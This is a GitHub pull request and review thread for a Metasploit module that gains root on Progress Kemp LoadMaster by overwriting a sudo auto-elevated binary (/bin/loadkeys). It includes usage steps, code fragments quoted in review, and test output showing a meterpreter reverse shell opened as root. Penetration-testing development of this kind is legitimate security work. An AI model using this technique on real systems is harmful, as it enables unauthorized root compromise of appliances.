Add Kemp Progress Loadmaster sudo abuse priv esc
rapid7/metasploit-framework pull request #19100
Opened 2024-04-17 19:10 UTC by bwatters-r7

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

This adds a privilege escalation module targeting Progress Kemp LoadMaster versions including `7.2.59.2.22338`.  The vulnerability lies in the configuration to allow `sudo` to auto elevate when run with certain files, but grants the non-root user `bal` write permissions to those file.  This exploit simply overwrites one of the files that auto-elevates with `/bin/bash` and runs a payload within a root-enabled /bin/bash session. 

## Verification

List the steps needed to make sure this thing works

- [ ] Start msfconsole
- [ ] Gain a session on a Progress Kemp Loadmaster target as the `bal` user
- [ ] Do: `use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024`
- [ ] Do: `set SESSION <session>`
- [ ] Do: `set LHOST <your host IP>`
- [ ] Do: `run`
- [ ] You should get a shell as the `root` user.

## Note
The easiest way to test this is in conjunction with https://github.com/rapid7/metasploit-framework/pull/18972, which this was a part of until we realized that when they patched CVE-2024-1212, they did not patch this.

2024-04-23 22:25 UTC, jvoisin commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +        cmd_exec("sudo /bin/rm #{datastore['BINARY_RENAME']}")
For a couple of those commands, `sudo` isn't required I think

2024-04-23 22:25 UTC, jvoisin commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +      cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}")
Why use `/bin/bash` to launch the payload, instead of launching it directly?

2024-05-02 14:33 UTC, bwatters-r7 commented
All suggestions on https://github.com/rapid7/metasploit-framework/pull/19150 should be addressed here, too....

2024-05-06 13:44 UTC, bwatters-r7 commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +      cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}")
You're right.  I had played with it earlier, and it did not seem to work.  I think my problem was that I was trying to directly copy, and I did not have the privileges to overwrite it directly, and needed to put the file in a temp location, then sudo cp the file over /bin/loadkeys.  Switched to that, now, unless we're running a command payload.

2024-05-06 13:45 UTC, bwatters-r7 commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +        cmd_exec("sudo /bin/rm #{datastore['BINARY_RENAME']}")
I believe I fixed that.....

2024-05-06 13:47 UTC, bwatters-r7 commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +      cmd_exec("sudo rm '#{target_binary}'")
```suggestion
      cmd_exec("sudo rm '#{target_binary}'") unless target_binary_hash == file_remote_digestmd5(target_binary)
```

2024-05-10 13:23 UTC, smcintyre-r7 requested changes
Just left a couple of minor comments. I tested both the dropper and command targets successfully.

2024-05-10 13:23 UTC, smcintyre-r7 commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +    vprint_status('Execute dropper')
Can you change this to something more descriptive in the context of the module output?

Maybe 
```suggestion
    vprint_status("Writing payload to #{temp_payload_path}")
```

2024-05-10 13:23 UTC, smcintyre-r7 commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +    vprint_status('Execute command')
Same thing here. In the context of the module output, it's not clear that this is a trace point showing that it's in the `execute_command` function. As it reads, it's unclear if it's executing a command or telling the user to execute a command.

```suggestion
    vprint_status('Preparing payload command')
```

2024-05-10 13:23 UTC, smcintyre-r7 commented on modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
> +    target_binary = datastore['TARGET_BINARY']
Can you make sure that `WRITABLE_DIR` is a directory on the target?
```suggestion
    end
    fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)
    
    target_binary = datastore['TARGET_BINARY']
```

2024-05-10 14:21 UTC, smcintyre-r7 approved these changes
Changes are looking good now, I'll go ahead and get this landed.

<details>
<summary>Testing Output</summary>

```
metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options 

Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   SESSION        -1               yes       The session to run this module on
   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
   WRITABLE_DIR   /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.31.129   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Dropper



View the full module info with the info, or info -d command.

metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > set VERBOSE 
VERBOSE => false
metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > set VERBOSE true
VERBOSE => true
metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run

[*] Started reverse TCP handler on 192.168.31.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found 3 indicators this is a KEMP product
[!] The service is running, but could not be validated.
[*] Writing payload to /tmp/.ihcqxrugkuq
[*] Moving /bin/loadkeys to /tmp/.kfoikqlxhta
[*] Moving /tmp/.ihcqxrugkuq to /bin/loadkeys
[*] Running /bin/loadkeys
[+] Deleted /tmp/.ihcqxrugkuq
[*] Meterpreter session 2 opened (192.168.31.129:4444 -> 192.168.31.135:43420) at 2024-05-10 10:19:37 -0400
[*] Moving /tmp/.kfoikqlxhta to /bin/loadkeys
[+] /bin/loadkeys returned to original contents

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.31.135
OS           : SuSE 7.2 (Linux 4.14.137)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/
meterpreter > 
```
</details>

2024-05-10 14:23 UTC, merged